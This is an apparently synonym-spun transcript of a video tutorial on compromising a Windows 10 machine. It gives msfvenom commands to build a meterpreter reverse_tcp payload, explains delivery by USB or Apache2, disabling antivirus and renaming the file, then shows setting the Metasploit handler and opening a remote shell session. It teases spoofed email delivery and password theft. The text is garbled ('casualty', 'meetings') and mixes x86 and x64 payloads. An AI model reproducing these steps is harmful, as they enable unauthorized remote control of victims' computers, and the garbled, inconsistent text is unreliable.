System Hacking Windows 10
| Hi everyone and welcome back. What's more, presently let us at long last adventure our Windows 10 machine. Thus, as a matter of first importance, we made the payload with this order here. We encoded it with this encoder here on five emphasess. We named it example.exe The LHOST that we determined, let me simply close this, is our IP address, and the LPORT is for 4444. Along these lines, what we need to do right currently is we need to convey this payload to our casualty. Presently interestingly, we will do that over a USB drive, which is the least demanding and generally basic. Presently for this assault to work, you should have actual admittance to the casualty's PC. Later on I will show you how you can do that over email, and how you can parody counterfeit messages and ship off anybody you need with the actual payload. In this way, most importantly, what we need to do is plug in your USB crash into your PC. So plug it in. Let me just.... Alright. So my USB drive is connected. Yet, you will see that it will identify it in your principle PC. Presently with the goal for you to identify it on the Kali Linux machine, what you need to do is go onto the gadgets here. So click on the gadgets, go to the USB, and here you need to discover your USB drive. So for me this is the Kingston information travel 3.0. What's more, in the event that you click on it you will see, in the event that you go indeed here, that now it is associated with your Kali Linux machine. |
Using comment This article
ip addr or ifconfig.
msfvenom -p windows/meterpreter/reverse_tcp -a x86 –platform windows -f exe LHOST=192.168.1.4 LPORT=4444 -o /root/Desktop/example.exe.
Metasploit using the command "msfconsole".
Using the command "use multi/handler".
Using the command "set payload windows/meterpreter/reverse_tcp".
"set LHOST 192.168.1.4" and " set LPORT 4444".
Once done,then type "run " or "exploit" and press Enter.
Thus, with the end goal for you to really utilize it this should spring up, and you simply click on open with records, and it will open your Kali Linux drive. Excuse me, your USB drive. And all you need to do from that point is essentially duplicate your example.exe or your payload, anyway you named it, to your USB drive. What's more, essentially glue it into the USB. So my payload is in the root catalog. So in the event that I simply type here in the root registry, let me simply erase the other two. So reverse.exe we don't require, and shell.exe we needn't bother with. In this way, we just need to duplicate the example.exe which is our last payload. So let us do that by utilizing the cp work in terminal, and afterward we indicate these records which is example.exe. Also, where we need it to go is media/root, and afterward tab it to choose your Kali Linux drive. Presently in the event that you would prefer not to duplicate it like this, you can fundamentally go to the applications or, excuse me, to the spots. Then, at that point you need to go to the PC. Then, at that point essentially discover your root registry. So let me simply discover it, root catalog. Simply click duplicate here, and you can glue it here. What's more, that is the way you can glue the document. Or then again you can utilize this order here. So fundamentally what you need to do after this, so media/root, simply click here the tab catch, and it consequently chooses in the event that you just have one USB drive connected, which you doubtlessly do.
Along these lines, we won't run this since I previously replicated it. What we need to do right currently is simply click here on this bolt to unmount the USB. From that point forward, let me simply close the entirety of this. Furthermore, what I need to do right presently is turn off it from my Kali Linux machine. So click here, and the present moment it will be connected into my Windows 10 machine. So what I need to do is reorder this record on my work area, or any place you essentially need. You need to give chairman OK. So we duplicate the file...but let me see. For what reason would it not like to? Alright. Along these lines, first thing. So this will occur. Thus, first thing that you need to do essentially is, most importantly let me simply erase it since this won't work. The motivation behind why is, above all else, you need to impair two things since this is a notable payload. You need to debilitate your antivirus in the event that you have it. So for me that is the bit protector.
I will simply tap on it, so this my antivirus, you open your antivirus, and what you need to do is fundamentally close the insurance for it. So this moment I will actually want to move my infection with the goal for it to not get erased, since my gadget is in danger. Presently you will do likewise with your antivirus, and you additionally need to do likewise with the Windows safeguard. Presently I previously had that wound down, so let me simply rehash the cycle. I will do it genuine quick. Along these lines, cp example.exe into media/root and afterward Kali drive. So presently I need to change my catalog. Ss we can see, thing was erased since it recognized it as a Trojan, as we can see here. That is the reason I was unable to run the document or duplicate it to the work area. Be that as it may, at the present time in the event that I go to my Kali Linux drive and I utilize the, let me simply rename the document to shell.exe so it isn't named example.exe. What's more, we need to do exactly the same thing as the past time, so un-mount the USB drive. So uncheck it here.
Presently how about we currently attempt to duplicate the record indeed. So presently as you can see it works, so the record is here. We needn't bother with this USB drive any longer, or we will simply leave it. It doesn't actually matter. Furthermore, the following thing you need to do before you really run this document is really fire up your audience. Presently, let me change my registry to root and run msfconsole. In this way, as I said, you need to utilize your lhost IP address and your LPORT that you indicated in the actual payload. Presently something more to note is that you don't have to convey the payload inside the USB drive, you can likewise download it over Apache2. However, I tracked down this basic. You can simply begin Apache2, then, at that point duplicate the payload into the/var/www/html organizer, and simply open up from Windows 10 machine your IP address in the Google search bar, and simply click on the record to download it. That is another approach to do it. Be that as it may, we will do it over the USB drive now since we previously did it. Presently once you open the msfconsole, what you need to do is use/exploit/multi/controller, and what you need to do is set the payload that you utilized during the time spent making the payload with msfvenom. Presently we utilized Windows x64 meterpreter switch TCP, so we need to set that payload too. So set payload windows/x64/meterpreter/reverse_tcp So the following thing, we need to show choices and set our LHOST. Presently our LHOST is .1.4 I accept. It must be equivalent to in the payload determination. In this way, set LHOST 192.168.1.4. Furthermore, at the present time, show alternatives by and by to twofold check everything, we have set the windows/x64/meterpreter/reverse_tcp as payload, our LPORT is equivalent to in the detail of our payload, and our LHOST is our IP address.
The solitary thing you need to do right by and by is type exploit. By and by to run the experience as an establishment connection you can essentially type your undertaking - j - z, and this is the way toward tuning in the background. So you can regardless execute orders. So show options and the sum of that as opposed to just holding on for the affiliation. As of now to close that cycle you can just sort here positions and it will say that the situations as of now running are the undertaking multihandler, and tuning in on this IP address here, and on this port. Accordingly, the solitary thing we need to do right as of now is truly open this archive. As of now, in case you pass on this archive over a USB drive, you can basically twofold tap it and it will open. Regardless, in case you download the report from the Internet, or from Apache2, or through email, or through whatever else, it will demand agree to run it.
It will ask are you sure you need to run this archive since it is a .exe record. It is an executable and it will do this for each executable you download over the web. It will ask might you want to run it since it is an executable record. However, since we passed on it over a USB, we can basically twofold tap it and it will run for us. It will not ask whatever else, and it will basically open. In any case, in case I go here to my Kali Linux machine, you will see that we got meterpreter meeting 1 open on our local listening address to the Windows 10 machine, which is .1.3 on this port. So if I basically click here enter, with the ultimate objective for you to enter this gathering, since we are doing this curiously, what you need to type in your Metasploit is basically gatherings, and thereafter it will show you the sum of the gatherings that you as of now have. By and by right now we simply have the gathering with our Windows 10 machine, since that is the solitary machine that we attacked at this moment.
With the goal for you to enter that meeting what you need to do, let me simply clear this so you can see it better, you can see this I.D. number 1. So when you type meetings it will printout the entirety of the meetings and you can see that the meeting I.D. is number 1. With the goal for you to enter it simply type here meeting - I and afterward 1. Uh oh... I think its meetings - I and afterward 1. OK, so we will simply add s. So meetings - I and afterward 1, and we can see we effectively got our meterpreter shell open. This present time this is the main opportunity, so what we need to do right currently is fundamentally run the assistance order. Since we don't have the foggiest idea what we can run, and the assist with instructing will printout the entirety of our accessible alternatives for the Metasploit system Meterpreter shell. So all together, for instance, to check who we will be we can simply type here getuid, and it will say that this is the client that we are right now. Thus, we will see that we are not the overseer which we will fix in post-double-dealing recordings, where I will show you what else you can run, and how you can hoist advantages, how you can get passwords, how you can transfer/download documents, and what else you can do.
In any case, until further notice on this will be acceptable. Anyway, for instance, in the event that I type ifconifg, you will see that my IP address is 192.168.1.8 and it is additionally 192.168.1.3 Now you may be asking, how would I have two IP addresses? Indeed, that is on the grounds that I have a remote organization interface and a link interface on my Windows 10 machine. So I essentially have two interfaces running and associated with the Internet right now. One of them, as should be obvious, is the remote organization connector which is at .1.8, and the other one is basically over link which is .1.3 So, this is the one. What's more, you can likewise, for instance, check some different orders... allow me just to type help so we can perceive what else we can run. I trust you can check the arp tables also. So you simply type here arp, better believe it. There are a lot of different orders, and a lot of different modules, that will likewise begin running in the following video. In any case, for the present we simply needed to get the meeting opened, and I will keep showing you what you can do in the following video. So I trust I see you there and fare thee well. Farewell.